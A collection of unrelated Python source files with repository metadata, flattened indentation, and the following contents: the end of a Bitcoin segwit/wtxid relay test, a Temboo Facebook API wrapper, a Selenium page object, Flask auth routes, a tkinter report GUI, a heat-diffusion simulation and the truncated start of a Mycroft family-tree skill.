r += struct.pack("<I", tx.nLockTime)
return r
class msg_bogus_tx(msg_tx):
def serialize(self):
return serialize_with_bogus_witness(self.tx)
self.nodes[0].sendtoaddress(self.nodes[0].getnewaddress(address_type='bech32'), 5)
self.nodes[0].generate(1)
unspent = next(u for u in self.nodes[0].listunspent() if u['spendable'] and u['address'].startswith('bcrt'))
raw = self.nodes[0].createrawtransaction([{"txid": unspent['txid'], "vout": unspent['vout']}], {self.nodes[0].getnewaddress(): 1})
tx = tx_from_hex(raw)
assert_raises_rpc_error(-22, "TX decode failed", self.nodes[0].decoderawtransaction, hexstring=serialize_with_bogus_witness(tx).hex(), iswitness=True)
with self.nodes[0].assert_debug_log(['Superfluous witness record']):
self.test_node.send_and_ping(msg_bogus_tx(tx))
raw = self.nodes[0].signrawtransactionwithwallet(raw)
assert raw['complete']
raw = raw['hex']
tx = tx_from_hex(raw)
assert_raises_rpc_error(-22, "TX decode failed", self.nodes[0].decoderawtransaction, hexstring=serialize_with_bogus_witness(tx).hex(), iswitness=True)
with self.nodes[0].assert_debug_log(['Unknown transaction optional data']):
self.test_node.send_and_ping(msg_bogus_tx(tx))
@subtest # type: ignore
def test_wtxid_relay(self):
# Use brand new nodes to avoid contamination from earlier tests
self.wtx_node = self.nodes[0].add_p2p_connection(TestP2PConn(wtxidrelay=True), services=NODE_NETWORK | NODE_WITNESS)
self.tx_node = self.nodes[0].add_p2p_connection(TestP2PConn(wtxidrelay=False), services=NODE_NETWORK | NODE_WITNESS)
# Check wtxidrelay feature negotiation message through connecting a new peer
def received_wtxidrelay():
return (len(self.wtx_node.last_wtxidrelay) > 0)
self.wtx_node.wait_until(received_wtxidrelay)
# Create a Segwit output from the latest UTXO
# and announce it to the network
witness_program = CScript([OP_TRUE])
script_pubkey = script_to_p2wsh_script(witness_program)
tx = CTransaction()
tx.vin.append(CTxIn(COutPoint(self.utxo[0].sha256, self.utxo[0].n), b""))
tx.vout.append(CTxOut(self.utxo[0].nValue - 1000, script_pubkey))
tx.rehash()
# Create a Segwit transaction
tx2 = CTransaction()
tx2.vin.append(CTxIn(COutPoint(tx.sha256, 0), b""))
tx2.vout.append(CTxOut(tx.vout[0].nValue - 1000, script_pubkey))
tx2.wit.vtxinwit.append(CTxInWitness())
tx2.wit.vtxinwit[0].scriptWitness.stack = [witness_program]
tx2.rehash()
# Announce Segwit transaction with wtxid
# and wait for getdata
self.wtx_node.announce_tx_and_wait_for_getdata(tx2, use_wtxid=True)
with p2p_lock:
lgd = self.wtx_node.lastgetdata[:]
assert_equal(lgd, [CInv(MSG_WTX, tx2.calc_sha256(True))])
# Announce Segwit transaction from non wtxidrelay peer
# and wait for getdata
self.tx_node.announce_tx_and_wait_for_getdata(tx2, use_wtxid=False)
with p2p_lock:
lgd = self.tx_node.lastgetdata[:]
assert_equal(lgd, [CInv(MSG_TX|MSG_WITNESS_FLAG, tx2.sha256)])
# Send tx2 through; it's an orphan so won't be accepted
with p2p_lock:
self.wtx_node.last_message.pop("getdata", None)
test_transaction_acceptance(self.nodes[0], self.wtx_node, tx2, with_witness=True, accepted=False)
# Expect a request for parent (tx) by txid despite use of WTX peer
self.wtx_node.wait_for_getdata([tx.sha256], 60)
with p2p_lock:
lgd = self.wtx_node.lastgetdata[:]
assert_equal(lgd, [CInv(MSG_WITNESS_TX, tx.sha256)])
# Send tx through
test_transaction_acceptance(self.nodes[0], self.wtx_node, tx, with_witness=False, accepted=True)
# Check tx2 is there now
assert_equal(tx2.hash in self.nodes[0].getrawmempool(), True)
if __name__ == '__main__':
SegWitTest().main()
| [
"contact@ocvcoin.com"
] | contact@ocvcoin.com |
071cd8751ab4d3c34048353a7eaa7e15171d75b1 | 44064ed79f173ddca96174913910c1610992b7cb | /Second_Processing_app/temboo/Library/Facebook/Actions/Fitness/Walks/UpdateWalk.py | 493e93d6dc4ff63b1d782b571214053924414cfc | [] | no_license | dattasaurabh82/Final_thesis | 440fb5e29ebc28dd64fe59ecd87f01494ed6d4e5 | 8edaea62f5987db026adfffb6b52b59b119f6375 | refs/heads/master | 2021-01-20T22:25:48.999100 | 2014-10-14T18:58:00 | 2014-10-14T18:58:00 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,177 | py | # -*- coding: utf-8 -*-
###############################################################################
#
# UpdateWalk
# Updates an existing walk action.
#
# Python version 2.6
#
###############################################################################
from temboo.core.choreography import Choreography
from temboo.core.choreography import InputSet
from temboo.core.choreography import ResultSet
from temboo.core.choreography import ChoreographyExecution
import json
class UpdateWalk(Choreography):
def __init__(self, temboo_session):
"""
Create a new instance of the UpdateWalk Choreo. A TembooSession object, containing a valid
set of Temboo credentials, must be supplied.
"""
Choreography.__init__(self, temboo_session, '/Library/Facebook/Actions/Fitness/Walks/UpdateWalk')
def new_input_set(self):
return UpdateWalkInputSet()
def _make_result_set(self, result, path):
return UpdateWalkResultSet(result, path)
def _make_execution(self, session, exec_id, path):
return UpdateWalkChoreographyExecution(session, exec_id, path)
class UpdateWalkInputSet(InputSet):
"""
An InputSet with methods appropriate for specifying the inputs to the UpdateWalk
Choreo. The InputSet object is used to specify input parameters when executing this Choreo.
"""
def set_AccessToken(self, value):
"""
Set the value of the AccessToken input for this Choreo. ((required, string) The access token retrieved from the final step of the OAuth process.)
"""
InputSet._set_input(self, 'AccessToken', value)
def set_ActionID(self, value):
"""
Set the value of the ActionID input for this Choreo. ((required, string) The id of the action to update.)
"""
InputSet._set_input(self, 'ActionID', value)
def set_Course(self, value):
"""
Set the value of the Course input for this Choreo. ((optional, string) The URL or ID for an Open Graph object representing the course.)
"""
InputSet._set_input(self, 'Course', value)
def set_EndTime(self, value):
"""
Set the value of the EndTime input for this Choreo. ((optional, date) The time that the user ended the action (e.g. 2013-06-24T18:53:35+0000).)
"""
InputSet._set_input(self, 'EndTime', value)
def set_ExpiresIn(self, value):
"""
Set the value of the ExpiresIn input for this Choreo. ((optional, integer) The amount of time (in milliseconds) from the publish_time that the action will expire.)
"""
InputSet._set_input(self, 'ExpiresIn', value)
def set_Message(self, value):
"""
Set the value of the Message input for this Choreo. ((optional, string) A message attached to this action. Setting this parameter requires enabling of message capabilities.)
"""
InputSet._set_input(self, 'Message', value)
def set_Place(self, value):
"""
Set the value of the Place input for this Choreo. ((optional, string) The URL or ID for an Open Graph object representing the location associated with this action.)
"""
InputSet._set_input(self, 'Place', value)
def set_Tags(self, value):
"""
Set the value of the Tags input for this Choreo. ((optional, string) A comma separated list of other profile IDs that also performed this action.)
"""
InputSet._set_input(self, 'Tags', value)
class UpdateWalkResultSet(ResultSet):
"""
A ResultSet with methods tailored to the values returned by the UpdateWalk Choreo.
The ResultSet object is used to retrieve the results of a Choreo execution.
"""
def getJSONFromString(self, str):
return json.loads(str)
def get_Response(self):
"""
Retrieve the value for the "Response" output from this Choreo execution. ((boolean) The response from Facebook.)
"""
return self._output.get('Response', None)
class UpdateWalkChoreographyExecution(ChoreographyExecution):
def _make_result_set(self, response, path):
return UpdateWalkResultSet(response, path)
| [
"dattasaurabh82@gmail.com"
] | dattasaurabh82@gmail.com |
609329789cfd420c62d86257a45a1e058b0604ad | cf8762eaeaf9b7f5fb0c7e5ef2b3c91c2543064a | /pages/recall_article_page.py | 8eca901a5773491a157cbe36000cdb8eb6cc1f6c | [] | no_license | metheuspsc/ca-test-automation | 7357de166555a4fea1753b444e5a3743599ff181 | 17936cf3008325bcaba7e3f1a1ff951f4218e378 | refs/heads/master | 2023-08-07T12:53:36.666330 | 2021-09-28T03:56:16 | 2021-09-28T03:56:16 | 409,317,389 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,799 | py | from selenium.webdriver.common.by import By
from pages.base_page import BasePage
class RecallArticlePage(BasePage):
"""Assumption: locators are inside the methods to simplify"""
@property
def expected_twitter_share_url(self):
return f"{'https://twitter.com/intent/tweet/?'}text={self.get_title()}&via=ConsumerAffairs&url={self.url}"
@property
def expected_facebook_share_url(self):
return "https://www.facebook.com/sharer.php?u=" + self.url
@property
def expected_email_share_url(self):
return "mailto:?subject=Check this ConsumerAffairs News&body=Check out this news: " + self.url
def get_disclaimer_text(self):
locator = (By.CLASS_NAME, "js-discl")
return self.browser.text(locator)
def get_title(self):
locator = (By.XPATH, "//h1[@itemprop='headline']")
return self.browser.text(locator)
def get_footer_text(self):
locator = (By.XPATH, "//div[@class='ca-ft__ctnt']//p")
return self.browser.text(locator)
def get_how_it_works_href(self):
locator = (By.XPATH, "//a[@aria-label='Learn more about us via our FAQ page']")
return self.browser.get_href(locator)
def get_facebook_share_href(self):
locator = (By.XPATH, "//a[@title='Share on Facebook']")
return self.browser.get_href(locator)
def get_twitter_share_href(self):
locator = (By.XPATH, "//a[@title='Share on Twitter']")
return self.browser.get_href(locator)
def get_email_share_href(self):
locator = (By.XPATH, "//a[@title='Share via Email']")
return self.browser.get_href(locator)
def fill_zip_code(self, zip_code):
locator = (By.XPATH, "//input[@name='zip']")
return self.browser.do_send_keys(locator, zip_code)
def click_find_my_match(self):
locator = (By.CLASS_NAME, "ca-mt-zip__btn")
return self.browser.click_and_wait_redirect(locator)
def close_modal(self):
locator = (By.XPATH, "//a[@class='ca-modal_close']")
if self.browser.find_elements(locator[0], locator[1]):
self.browser.do_click(locator)
def get_related_news(self):
"""Returns a list with the first and the last news on the latest news modal"""
locator = (By.CSS_SELECTOR, "#sidebar > nav.h-sect--pad-2.h-coll-vert.article-links.related-links")
related_news_box = self.browser.wait_for_element(locator)
related_news = related_news_box.find_elements(By.CSS_SELECTOR, "a")
if related_news:
if len(related_news) == 1:
return related_news[0].get_attribute("href")
return [
related_news[0].get_attribute("href"),
related_news[-1].get_attribute("href"),
]
return []
| [
"matheuspsc@gmail.com"
] | matheuspsc@gmail.com |
7e95c4afa11a45fa01dc3edc9be96d2534ed7689 | b1b35e2d2ba2c3fdda94a0680a06ca0f71595a4e | /app/test/data/message/bitdiff.py | f6528d4abbca03674bd202df465c81c42f906684 | [] | no_license | GriffinSchneider/Steganopodous | 86857a0dba62a2ce0acbef232a9e95267693bab8 | 444594e6cc8eff78dded636c5f547e3296d8247d | refs/heads/master | 2016-09-06T02:42:35.692669 | 2012-04-17T19:14:51 | 2012-04-17T19:14:51 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 489 | py | #!/usr/bin/env python
from bitstream import BitStream
import sys
def compare(file1, file2):
stream1 = BitStream(file1)
stream2 = BitStream(file2)
n_same = 0
n_different = 0
for bit1, bit2 in zip(stream1, stream2):
if (bit1 is None or bit2 is None):
break
if bit1 == bit2:
n_same += 1
else:
n_different += 1
return 1.0*n_same/(n_different+n_same)
if __name__ == "__main__":
print compare(open(sys.argv[1]), open(sys.argv[2]))
| [
"souvey@ccs.neu.edu"
] | souvey@ccs.neu.edu |
10a74a89df0e005033f9a0040c90b46da278a520 | e71b6d14fbdbc57c7234ca45a47329d7d02fc6f7 | /flask_api/venv/lib/python3.7/site-packages/vsts/member_entitlement_management/v4_1/models/user_entitlement_operation_reference.py | 0e8a8c4903319844a6245687d671b999ccabee76 | [
"MIT"
] | permissive | u-blavins/secret_sasquatch_society | c36993c738ab29a6a4879bfbeb78a5803f4f2a57 | 0214eadcdfa9b40254e331a6617c50b422212f4c | refs/heads/master | 2020-08-14T00:39:52.948272 | 2020-01-22T13:54:58 | 2020-01-22T13:54:58 | 215,058,646 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,307 | py | # --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
# Generated file, DO NOT EDIT
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------------------------
from .operation_reference import OperationReference
class UserEntitlementOperationReference(OperationReference):
"""UserEntitlementOperationReference.
:param id: Unique identifier for the operation.
:type id: str
:param plugin_id: Unique identifier for the plugin.
:type plugin_id: str
:param status: The current status of the operation.
:type status: object
:param url: URL to get the full operation object.
:type url: str
:param completed: Operation completed with success or failure.
:type completed: bool
:param have_results_succeeded: True if all operations were successful.
:type have_results_succeeded: bool
:param results: List of results for each operation.
:type results: list of :class:`UserEntitlementOperationResult <member-entitlement-management.v4_1.models.UserEntitlementOperationResult>`
"""
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'plugin_id': {'key': 'pluginId', 'type': 'str'},
'status': {'key': 'status', 'type': 'object'},
'url': {'key': 'url', 'type': 'str'},
'completed': {'key': 'completed', 'type': 'bool'},
'have_results_succeeded': {'key': 'haveResultsSucceeded', 'type': 'bool'},
'results': {'key': 'results', 'type': '[UserEntitlementOperationResult]'}
}
def __init__(self, id=None, plugin_id=None, status=None, url=None, completed=None, have_results_succeeded=None, results=None):
super(UserEntitlementOperationReference, self).__init__(id=id, plugin_id=plugin_id, status=status, url=url)
self.completed = completed
self.have_results_succeeded = have_results_succeeded
self.results = results
| [
"usama.blavins1@gmail.com"
] | usama.blavins1@gmail.com |
225b6d5941ba617b3affab3562256f853598178b | c15a28ae62eb94dbf3ed13e2065195e572a9988e | /Cook book/src/9/defining_a_decorator_with_user_adjustable_attributes/example2.py | 36d1bb206aabac56e5e7fba7acecdad70229e638 | [] | no_license | xuyuchends1/python | 10798c92840a1a59d50f5dc5738b2881e65f7865 | 545d950a3d2fee799902658e8133e3692939496b | refs/heads/master | 2021-01-25T07:07:04.812140 | 2020-02-28T09:25:15 | 2020-02-28T09:25:15 | 93,647,064 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,305 | py | # Alternate formulation using function attributes directly
from functools import wraps
import logging
def logged(level, name=None, message=None):
'''
Add logging to a function. level is the logging
level, name is the logger name, and message is the
log message. If name and message aren't specified,
they default to the function's module and name.
'''
def decorate(func):
logname = name if name else func.__module__
log = logging.getLogger(logname)
logmsg = message if message else func.__name__
@wraps(func)
def wrapper(*args, **kwargs):
wrapper.log.log(wrapper.level, wrapper.logmsg)
return func(*args, **kwargs)
# Attach adjustable attributes
wrapper.level = level
wrapper.logmsg = logmsg
wrapper.log = log
return wrapper
return decorate
# Example use
@logged(logging.DEBUG)
def add(x, y):
return x + y
@logged(logging.CRITICAL, 'example')
def spam():
print('Spam!')
if __name__ == '__main__':
import logging
logging.basicConfig(level=logging.DEBUG)
print(add(2, 3))
# Change the log message
add.logmsg = 'Add called'
print(add(2, 3))
# Change the log level
add.level = logging.WARNING
print(add(2, 3))
| [
"xuyuchends@163.com"
] | xuyuchends@163.com |
cdae4d6eaf780f684ddda35f11ba8dc2ccd4d274 | 2173932d81796dc1ebc9c206a663d5d37e0c037b | /lab2/lab2.py | 997fbe4eb6cc49482bfc84d7bc62f9d8476ba25d | [] | no_license | filipprasalek/mops | 8ac4ddcdd27760bdf6dca158fe5045411f4c15bd | 3bf85e6daa2b250fff2c9000f562084ae0d2a7a5 | refs/heads/master | 2020-05-02T01:33:09.485713 | 2019-04-19T21:06:05 | 2019-04-19T21:06:05 | 177,687,896 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,431 | py | import numpy as np
from mpl_toolkits.mplot3d import Axes3D
from matplotlib.ticker import LinearLocator, FormatStrFormatter
import matplotlib.pyplot as plt
from matplotlib import cm
def is_border(i, j, area_size):
return i == 0 or i == area_size - 1 or j == 0 or j == area_size - 1
def is_heater(i, j, area_size, heater_size):
low_boundary = area_size / 2 - heater_size / 2
high_boundary = area_size / 2 + heater_size / 2
return (low_boundary <= i < high_boundary) and (low_boundary <= j < high_boundary)
def initialize_area(area_size, heater_size, border_temp, heater_temp):
area = np.zeros((area_size, area_size))
for i in range(area_size):
for j in range(area_size):
if is_border(i, j, area_size):
area[i, j] = border_temp
elif is_heater(i, j, area_size, heater_size):
area[i, j] = heater_temp
else:
area[i, j] = 20
return area
def new_x_temp(x, y, previous_area, metal, denominator, dt):
return (metal["K"] * dt * (
previous_area[x + 1, y] - 2 * previous_area[x, y] + previous_area[x - 1, y])) / denominator
def new_y_temp(x, y, previous_area, metal, denominator, dt):
return (metal["K"] * dt * (
previous_area[x, y + 1] - 2 * previous_area[x, y] + previous_area[x, y - 1])) / denominator
def draw_3d_plot(area, dx, dy, time, size):
x = np.multiply(np.arange(0, size), dx)
y = np.multiply(np.arange(0, size), dy)
xx, yy = np.meshgrid(x, y)
fig = plt.figure()
ax = fig.gca(projection='3d')
ax.set_title("Simulation time: {0}s, spatial step dx = dy = {1}m".format(time, dx, dy))
surf = ax.plot_surface(xx, yy, area, cmap=cm.coolwarm, linewidth=0, antialiased=True)
ax.set_xlabel("x [m]")
ax.set_ylabel("y [m]")
ax.zaxis.set_major_locator(LinearLocator(10))
ax.zaxis.set_major_formatter(FormatStrFormatter('%.02f'))
colorbar = fig.colorbar(surf, shrink=0.5, aspect=5)
colorbar.set_label("temp [C]")
plt.show()
def first_boundary_conndition_simulation(steps, initial_area, metal, dx, dy, dt, size):
denom_x = metal["cw"] * metal["ro"] * dx ** 2
denom_y = metal["cw"] * metal["ro"] * dy ** 2
area_in_step = initial_area
for i in range(1, steps):
prev_area = area_in_step[i - 1]
for x in range(1, size - 1):
for y in range(1, size - 1):
if is_heater(x, y, size, h_size):
continue
x_temp = new_x_temp(x, y, prev_area, metal, denom_x, dt)
y_temp = new_y_temp(x, y, prev_area, metal, denom_y, dt)
area_in_step[i][x, y] = prev_area[x, y] + x_temp + y_temp
draw_3d_plot(area_in_step[steps - 1], dx, dy, dt * steps, size)
metal_params = {
"alumina": {"ro": 2700, "cw": 900, "K": 237},
"cooper": {"ro": 8920, "cw": 380, "K": 401},
"steel": {"ro": 7860, "cw": 450, "K": 58}
}
a_size = 6
h_size = 2
border_t = 10 # [C]
heater_t = 80 # [C]
steps = 100
dt = 0.01 # [s]
dx = dy = 0.01 # [m]
area_states = [initialize_area(a_size, h_size, border_t, heater_t)] * steps
first_boundary_conndition_simulation(steps, area_states, metal_params["alumina"], dx, dy, dt, a_size)
first_boundary_conndition_simulation(steps, area_states, metal_params["cooper"], dx, dy, dt, a_size)
first_boundary_conndition_simulation(steps, area_states, metal_params["steel"], dx, dy, dt, a_size)
| [
"filip.prasalek@sabre.com"
] | filip.prasalek@sabre.com |
488f782a5d0a2f5fbf2d8e648a04610e918919a7 | 16dcdbb5e2589ce8bd0bfe52b3bd9cdc5c7190b6 | /polls/views.py | 13f02ddf3068d5912d57282934741fa06294be79 | [] | no_license | bstem/EIATool | d2ef68434c2ad0692cfd4ac008fb97031ce6ad95 | be1d7cc455e6088f57c9e7f75badf9e703f07b21 | refs/heads/master | 2021-01-19T12:30:42.082621 | 2017-02-23T22:35:14 | 2017-02-23T22:35:14 | 82,317,655 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,640 | py | from django.shortcuts import render, get_object_or_404
from django.http import HttpResponse, HttpResponseRedirect
from django.urls import reverse
from django.utils import timezone
from django.views import generic
from .models import Question, Choice
class IndexView(generic.ListView):
template_name = 'polls/index.html'
context_object_name = 'latest_question_list'
def get_queryset(self):
return Question.objects.filter(pub_date__lte=timezone.now()).order_by('-pub_date')[:5]
class DetailView(generic.DetailView):
model = Question
template_name = 'polls/detail.html'
def get_queryset(self):
"""
Excludes any questions not published yet
"""
return Question.objects.filter(pub_date__lte=timezone.now())
class ResultsView(generic.DetailView):
model = Question
template_name = 'polls/results.html'
def vote(request, question_id):
question = get_object_or_404(Question, pk=question_id)
try:
selected_choice = question.choice_set.get(pk=request.POST['choice'])
except (KeyError, Choice.DoesNotExist):
# if error, redisplay question voting form
context = {
'question': question,
'error_message': "You didn't select a choice",
}
return render(request, 'polls/detail.html', context)
else:
selected_choice.votes += 1
selected_choice.save()
# use Redirect when successfully dealing with POST data
# - this prevents data from being posted twice if a user hits Back Button
return HttpResponseRedirect(reverse('polls:results', args=(question.id,)))
| [
"CEntzminger@bstem.biz"
] | CEntzminger@bstem.biz |
e1135b626e8b2a874b38079c63bf35c3d5d17c8e | 739e20c1c526c066be0b3248c12bc05c6e57653c | /ibscrubgui.py | df2d12123398599af3dbdbd0f375f9abab94a31f | [] | no_license | betmit324/ib_report | d44eafb8837b2bc07eab4f8805194a3f9cd65c6e | 8de0306f9639e3b231cbf651c230a9091de5a723 | refs/heads/master | 2021-01-11T16:42:55.977376 | 2018-02-27T15:50:00 | 2018-02-27T15:50:00 | 80,143,964 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,551 | py | import tkinter
from tkinter import ttk
from tkinter.filedialog import askdirectory
import os
import os.path
import time
import ib
import sys
import threading
class StdoutRedirector(object):
def __init__(self,text_widget):
self.text_space = text_widget
def write(self,string):
self.text_space.insert('end', string)
self.text_space.see('end')
class IbScrubGui(tkinter.Tk):
def __init__(self, parent):
tkinter.Tk.__init__(self, parent)
self.parent = parent
self.dir_opt = options = {}
self.directory = ''
options['initialdir'] = os.path.join(os.path.expanduser('~'), "Documents")
options['mustexist'] = True
options['parent'] = parent
options['title'] = 'This is a title'
self.working_dir_var = tkinter.StringVar()
self.working_dir_label_var = tkinter.StringVar()
self.select_button = ttk.Button(self, text="Choose Source Directory",
command=self.on_select_button_click)
self.select_button.grid(column=0, row=0, sticky='NW', padx=10, pady=10)
self.generate_button = ttk.Button(self, text="Generate IB Scrub Report",
command=self.on_generate_button_click)
self.generate_button.grid(column=1, row=0, sticky='NE', padx=10, pady=10)
self.text_box = tkinter.Text(self.parent, wrap='word', height=28, width=50)
self.text_box.grid(column=0, row=2, columnspan=2, sticky='NSWE', padx=5, pady=5)
sys.stderr = StdoutRedirector(self.text_box)
self.active_thread = None
# self.include_flash = tkinter.IntVar()
# self.new_asups = tkinter.IntVar()
self.initialize()
def initialize(self):
self.grid()
self.working_dir_var.set("Select working directory")
# label = tkinter.Label(self, textvariable=self.working_dir_label_var, anchor="w", fg="white", bg="blue")
style = ttk.Style()
style.configure("BW.TLabel", anchor="w", foreground="white", background="blue")
label = ttk.Label(style="BW.TLabel", textvariable=self.working_dir_label_var)
label.grid(column=0, row=1, columnspan=2, sticky='EW', padx=10, pady=10)
self.working_dir_label_var.set("Please select working directory with IB Details, Service Contracts Expiring, score.xlsx, etc")
# ttk.Checkbutton(self, text="Include Flash Tab", variable=self.include_fl).grid(row=3, sticky='W')
# ttk.Checkbutton(self, text="Get New Asups", variable=self.new_asups).grid(row=4, sticky='W')
self.generate_button['state'] = 'disabled'
self.grid_columnconfigure(0, weight=1)
self.resizable(True, False)
self.minsize(width=1000, height=600)
self.update()
self.geometry(self.geometry())
def on_select_button_click(self):
if not self.active_thread or not self.active_thread.is_alive():
self.directory = askdirectory()
if self.directory:
os.chdir(self.directory)
self.working_dir_label_var.set(self.directory)
# with open("thisisatest.txt", 'w') as f:
# print(self.directory, file=f)
# print("You clicked the select button")
self.generate_button['state'] = 'normal'
def on_generate_button_click(self):
if not self.active_thread or not self.active_thread.is_alive():
# self.generate_button['state'] = 'disabled'
# self.select_button['state'] = 'disabled'
# ib_report = ib.IbDetails()
print("Starting...", file=sys.stderr)
# if self.include_flash.get():
# include_flash = True
# else:
# include_flash = False
# if self.new_asups.get():
# new_asups = True
# else:
# new_asups = False
self.active_thread = threading.Thread(target=ib.IbDetails)
self.active_thread.start()
# time.sleep(1)
# os.system("start " + os.path.join(self.directory, "thisisatest.txt"))
# os.system("start " + os.path.join(self.directory, ib_report.get_ib_report_name()))
# print("You clicked the generate button")
# self.generate_button['state'] = 'normal'
# self.select_button['state'] = 'normal'
if __name__ == "__main__":
app = IbScrubGui(None)
app.title('IB Team Installed Base Scrub v1.8')
app.mainloop()
| [
"betmit324@gmail.com"
] | betmit324@gmail.com |
49a988bfd6d2afbbbf60fd6596b72b40d5ceae43 | d27f38f666942e07446c0a2dba546652c16b80e3 | /app/routes.py | 341ef2a0327266dd8d8e3320174299a88b60ccc5 | [] | no_license | johnieje/switcha | 4da3238bb3af43670f09bbc563f821e5a4044302 | 6a46f7e7fa832af6c492d3dff0ce10b592e1e8f0 | refs/heads/master | 2022-04-19T07:32:56.209503 | 2020-04-18T12:16:26 | 2020-04-18T12:16:26 | 256,761,359 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,237 | py | from flask import render_template, flash, redirect, url_for, request
from app import app, db
from app.switches import Switch
from app.forms import LoginForm, RegistrationForm
from flask_login import current_user, login_user, logout_user, login_required
from app.models import User
from werkzeug.urls import url_parse
@app.route('/')
@app.route('/index')
@login_required
def index():
var = { 'app_name' : 'Switcha Network Management Solution'}
devices = [
{
'id' : 1,
'name' : 'Statistics House',
'ip' : '41.222.1.105'
},
]
"""
switch = Switch(devices[0]['ip'])
connection = switch.connection(devices[0]['ip'])
if connection:
flash('Connected')
"""
return render_template('index.html', title="Home", devices=devices, var=var)
@app.route('/login', methods=['GET', 'POST'])
def login():
if current_user.is_authenticated:
return redirect(url_for('index'))
form = LoginForm()
if form.validate_on_submit():
user = User.query.filter_by(username=form.username.data).first()
if user is None or not user.check_password(form.password.data):
flash('Invalid Username or Password')
return redirect(url_for('login'))
login_user(user, remember=form.remember_me.data)
next_page = request.args.get('next')
if not next_page or url_parse(next_page).netloc != '':
next_page = url_for('index')
return redirect(next_page)
return render_template('login.html', title='Sign In', form=form)
@app.route('/logout')
def logout():
logout_user()
return redirect(url_for('index'))
@app.route('/register', methods=['GET', 'POST'])
def register():
if current_user.is_authenticated:
return redirect(url_for('index'))
form = RegistrationForm()
if form.validate_on_submit():
user = User(username=form.username.data, email=form.email.data)
user.set_password(form.password.data)
db.session.add(user)
db.session.commit()
flash('Congratulations, you are now a registered user!')
return redirect(url_for('login'))
return render_template('register.html', title='Register', form=form)
| [
"johnieje@yahoo.com"
] | johnieje@yahoo.com |
a2635ca00b66a4ad203a975c8ff1cd9f28207c6b | 6c26d154b4a216c2f3a84891383a8d18299c527f | /NXHello/NXWebserver/NXWebserver.py | ef68321d09381ae215793c6c7e53dd281655bd4d | [] | no_license | htonal/NXHello | 6b03df95737bc55af526ed3f47cd0b12b11b0b31 | 7b4545e4f811136abd1e0efc29d17c0567de2ccb | refs/heads/master | 2020-05-24T16:37:35.921873 | 2019-05-18T13:49:42 | 2019-05-18T13:49:42 | 183,691,739 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,312 | py | # -*- coding: utf-8 -*-
# Copyright 2019 TONAL SYSTEM
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
import os
from pathlib import Path
import logging
import NXSettingsConfig
from flask import Flask, Blueprint
from flask import redirect, url_for
# from flask_appbuilder import AppBuilder, SQLA
from NXTest.NXTest import NXTest
routes = Blueprint('routes', __name__)
@routes.route('/')
def index():
# return redirect(url_for('Airflow.index'))
return 'Hello, World!'
class NXWebserver:
def __init__(self):
self.app = Flask(__name__)
self.app.register_blueprint(routes)
def run(self):
try:
logging.info('webserver starting')
self.app.run()
except Exception as e:
logging.critical(e)
| [
"info@tonal.fr"
] | info@tonal.fr |
04615ee4d3c0ae9fc7d72354e454938c68ec91bb | 7a7e560d4aecf4fd57bdcd8648d0ed9e1077c640 | /test03/test04.py | a7e1a7725e600a296c618d66b33cea7a98357e22 | [] | no_license | programmingkids/python-test-level2 | 8b8168306b27b9659d8991086d1e62a545917c3d | 1a4b983a1f615275ab3dd2e89d42b0916cf7c848 | refs/heads/master | 2022-11-21T15:35:15.883339 | 2020-07-20T09:54:01 | 2020-07-20T09:54:01 | 281,015,098 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 53 | py | # 実行結果
# 66
data = [12,15,25,11,14,18,22]
| [
"ec2-user@ip-172-31-11-152.ap-northeast-1.compute.internal"
] | ec2-user@ip-172-31-11-152.ap-northeast-1.compute.internal |
77c26d3223480b1ecc5baddd9d23d61fb4fd4509 | 0c176cbc9e0965f89e60b410c8413519d291f51d | /__init__.py | cc0674ca22643c6b993a0879c528718dd15f286c | [] | no_license | henridbr/henridbr-my_family_tree | 353b01af5d3152c1778775b4c262d3c17c6347bf | 727339dc710be79deaab56f5f8eb8c52d8fb4522 | refs/heads/master | 2022-08-01T10:22:52.663316 | 2020-05-25T19:17:56 | 2020-05-25T19:17:56 | 152,764,231 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,586 | py | # Copyright 2016 Mycroft AI, Inc.
#
# This file is part of Mycroft Core.
#
# Mycroft Core is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Mycroft Core is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Mycroft Core. If not, see <http://www.gnu.org/licenses/>.
# Mycroft_my_family_tree
# Mycroft libraries
from adapt.intent import IntentBuilder
from mycroft.skills.core import MycroftSkill
from mycroft.util.log import getLogger
from mycroft import intent_handler
from os.path import dirname, exists, join
import requests
import os
import json
__author__ = 'henridbr' # hd@uip
LOGGER = getLogger(__name__)
class MyFamilyTreeSkill(MycroftSkill):
def __init__(self):
super(MyFamilyTreeSkill, self).__init__(name="MyFamilyTreeSkill")
@intent_handler(IntentBuilder("MyFamilyTreeIntent").require("MyFamilyTreeKeyword"))
def handle_family_learning_intent(self, message):
self.speak_dialog("got.it.memory")
### Find who is my ?
@intent_handler(IntentBuilder("FamilyMemberIntent").require("FamilyMemberKeyword"))
def handle_family_member_intent(self, message):
